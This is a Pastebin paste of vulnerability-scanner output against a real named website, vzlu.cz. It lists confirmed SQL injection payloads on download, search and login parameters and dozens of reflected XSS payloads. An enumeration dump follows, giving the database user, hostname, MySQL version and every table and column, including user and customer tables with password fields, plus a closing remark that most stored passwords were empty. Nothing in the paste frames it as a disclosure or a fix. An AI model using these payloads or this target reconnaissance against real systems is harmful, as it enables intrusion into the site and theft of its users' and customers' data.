Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ||| SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/download.php?file=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: file
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- ||| Boolean Based SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/download.php?file=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: file
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- ||| [High Possibility] SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/search.php?search='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: search
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/login.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/old/index.php?page=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/download.php?file=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: file
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/new/search.php?search='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: search
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/new/login.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- ||| XSS (Cross-site Scripting)
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/?'"--></style></script><script>alert(0x002DE9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002DE9)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/?'"--></style></script><script>alert(0x002DF1)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002DF1)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/mapa-stranek?'"--></style></script><script>alert(0x002DF8)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002DF8)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/en/?'"--></style></script><script>alert(0x002DF9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002DF9)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/aktivity/?'"--></style></script><script>alert(0x002DFD)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002DFD)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/spolecnost/?'"--></style></script><script>alert(0x002DFE)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002DFE)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/vyzkumne-projekty/?'"--></style></script><script>alert(0x002E4C)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002E4C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/publikace/?'"--></style></script><script>alert(0x002E5A)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002E5A)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/transfer-vysledku/?'"--></style></script><script>alert(0x002E5B)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002E5B)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/aktualne/?'"--></style></script><script>alert(0x002E70)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002E70)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/registrace?'"--></style></script><script>alert(0x002E74)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002E74)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/en/news/?'"--></style></script><script>alert(0x002E8E)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002E8E)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/en/news/actual-events/?'"--></style></script><script>alert(0x002E9B)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002E9B)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/search.php?'"--></style></script><script>alert(0x002ED6)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002ED6)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/spolecnost/profil-spolecnosti/?'"--></style></script><script>alert(0x002F6E)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002F6E)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/vyzkumne-projekty/mezinarodni-projekty/ramcove-programy-eu?'"--></style></script><script>alert(0x002FAE)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002FAE)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/spolecnost/profil-spolecnosti/zakladni-informace?'"--></style></script><script>alert(0x002FB0)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002FB0)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/transfer-vysledku/clanky-v-odbornych-periodicich-j/?'"--></style></script><script>alert(0x002FCB)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002FCB)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/transfer-vysledku/dalsi-aplikovane-vystupy-z-g-n/?'"--></style></script><script>alert(0x002FD1)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002FD1)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/vyzkumne-projekty/mezinarodni-projekty/?'"--></style></script><script>alert(0x002FD6)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002FD6)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.vzlu.cz/cz/spolecnost/profil-spolecnosti/organizacni-struktura-a-management?'"--></style></script><script>alert(0x002FFA)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002FFA)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/transfer-vysledku/certifikovane-metodiky-n-met/?'"--></style></script><script>alert(0x003001)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x003001)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/transfer-vysledku/overene-technologie-z-tech/?'"--></style></script><script>alert(0x003007)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x003007)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/transfer-vysledku/prototypy-g-prot/?'"--></style></script><script>alert(0x003029)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x003029)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/transfer-vysledku/clanky-ve-sbornicich-d/?'"--></style></script><script>alert(0x003036)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x003036)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/transfer-vysledku/usporadani-workshopu-w/?'"--></style></script><script>alert(0x003056)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x003056)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/transfer-vysledku/kapitoly-v-odbornych-knihach-c/?'"--></style></script><script>alert(0x003055)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x003055)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/cz/registrace
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: heslo
- Parameter Type: Post
- Attack Pattern: "></style><script>alert(9)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/en/results-transfer/?'"--></style></script><script>alert(0x0031CA)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0031CA)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/en/results-transfer/articles-in-scietific-journals-j/?'"--></style></script><script>alert(0x0031DB)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0031DB)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/en/results-transfer/certified-methodology-n-met/?'"--></style></script><script>alert(0x00320A)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00320A)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/download.php?file='"--></style></script><script>alert(0x003216)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: file
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x003216)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/en/results-transfer/prototype-g-prot/?'"--></style></script><script>alert(0x003229)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x003229)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/en/results-transfer/articles-in-conference-proceedings-d/?'"--></style></script><script>alert(0x00323C)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00323C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/en/results-transfer/functional-sample-g-funk/?'"--></style></script><script>alert(0x00323F)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00323F)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/en/results-transfer/verified-technology-z-tech/?'"--></style></script><script>alert(0x003243)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x003243)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/new/?'"--></style></script><script>alert(0x0032B1)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0032B1)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/new/search.php?'"--></style></script><script>alert(0x0032C5)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0032C5)</script>
- ||| MySQL Database Identified
- Severity : Information
- Confirmation: Confirmed
- URL: http://www.vzlu.cz/download.php?file=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Parameter Name: file
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- ||| Info DB
- Target: http://www.vzlu.cz/download.php?file=-1 OR 17-7=10
- DB Server: MySQL error based
- Resp. Time(avg): 1032 ms
- Current User: nh374901@localhost
- Sql Version: 5.5.28
- Current DB: nh374901db
- System User: nh374901@localhost
- Host Name: castor.dismedia.cz
- Installation dir: /usr/local/mysql
- DB User: 'nh374901'@'localhost'
- Data Bases: information_schema, nh374901db
- DB: nh374901db
- Count(table_name) of information_schema.tables where table_schema=0x6E683337343930316462 is 16
- Table found: clanky
- Table found: clanky_dirs
- Table found: napiste_nam
- Table found: obrazky
- Table found: obrazky_dirs
- Table found: poll_data
- Table found: poll_voterip
- Table found: polls
- Table found: soubory
- Table found: soubory_dirs
- Table found: users
- Table found: users_actions_history
- Table found: users_logging
- Table found: videa
- Table found: videa_dirs
- Table found: zakaznici
- Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x636C616E6B79 is 20
- Column found: id
- Column found: nazev_cz
- Column found: nazev_en
- Column found: slogan_cz
- Column found: slogan_en
- Column found: text_cz
- Column found: text_en
- Column found: text_vpravo_cz
- Column found: text_vpravo_en
- Column found: obrazek_hlavni_id
- Column found: obrazek_spodek_id
- Column found: obrazky_dir_id
- Column found: soubory_dir_id
- Column found: videa_dir_id
- Column found: dir_id
- Column found: poradi
- Column found: vytvoreno
- Column found: ukonceno
- Column found: smazano
- Column found: zobrazovat
- Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x636C616E6B795F64697273 is 11
- Column found: id
- Column found: nazev_cz
- Column found: nazev_en
- Column found: slogan_cz
- Column found: text_cz
- Column found: text_en
- Column found: obrazek_id
- Column found: parent_id
- Column found: poradi
- Column found: zobrazovat
- Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x6E6170697374655F6E616D is 9
- Column found: id
- Column found: jmeno
- Column found: prijmeni
- Column found: firma
- Column found: email
- Column found: telefon
- Column found: dotaz
- Column found: odeslano
- Column found: ip
- Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x6F6272617A6B79 is 13
- Column found: id
- Column found: nazev_cz
- Column found: nazev_en
- Column found: popis_cz
- Column found: popis_en
- Column found: soubor
- Column found: dir_id
- Column found: sirka_org
- Column found: vyska_org
- Column found: pouzitelnost2
- Column found: orez_format2_x1
- Column found: orez_format2_y1
- Column found: poradi
- Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x6F6272617A6B795F64697273 is 4
- Column found: id
- Column found: nazev_cz
- Column found: nazev_en
- Column found: poradi
- Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x706F6C6C5F64617461 is 4
- Column found: id
- Column found: pollid
- Column found: text
- Column found: hits
- Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x706F6C6C5F766F7465726970 is 4
- Column found: id
- Column found: pollid
- Column found: ip
- Column found: vote_time
- Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x706F6C6C73 is 7
- Column found: id
- Column found: title
- Column found: voters
- Column found: created
- Column found: valid
- Column found: published
- Column found: lag
- Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x736F75626F7279 is 10
- Column found: id
- Column found: nazev_cz
- Column found: nazev_en
- Column found: popis_cz
- Column found: popis_en
- Column found: soubor
- Column found: pocet_stazeni
- Column found: zabezpeceni
- Column found: dir_id
- Column found: poradi
- Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x736F75626F72795F64697273 is 4
- Column found: id
- Column found: nazev_cz
- Column found: nazev_en
- Column found: zabezpeceni
- Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x7573657273 is 7
- Column found: id
- Column found: user
- Column found: pass
- Column found: lastaccess
- Column found: lastip
- Column found: created
- Column found: rights
- Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x75736572735F616374696F6E735F686973746F7279 is 7
- Column found: id
- Column found: akce
- Column found: tabulka
- Column found: zaznam_id
- Column found: user_id
- Column found: date_time
- Column found: ip
- Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x75736572735F6C6F6767696E67 is 8
- Column found: id
- Column found: user_id
- Column found: user_login
- Column found: date_time
- Column found: ip
- Column found: login
- Column found: pass
- Column found: success
- Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x7669646561 is 10
- Column found: id
- Column found: nazev_cz
- Column found: nazev_en
- Column found: popis_cz
- Column found: popis_en
- Column found: soubor
- Column found: youtube_code
- Column found: obrazek_id
- Column found: dir_id
- Column found: poradi
- Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x76696465615F64697273 is 4
- Column found: id
- Column found: nazev_cz
- Column found: nazev_en
- Column found: poradi
- Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x7A616B617A6E696369 is 14
- Column found: id
- Column found: jmeno
- Column found: prijmeni
- Column found: firma
- Column found: ulice
- Column found: mesto
- Column found: psc
- Column found: stat
- Column found: telefon
- Column found: email
- Column found: heslo
- Column found: aktivni
- Column found: vytvoreno
- Column found: smazano
- >> Most of the items were in tests on stored passwords empty ! <<
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement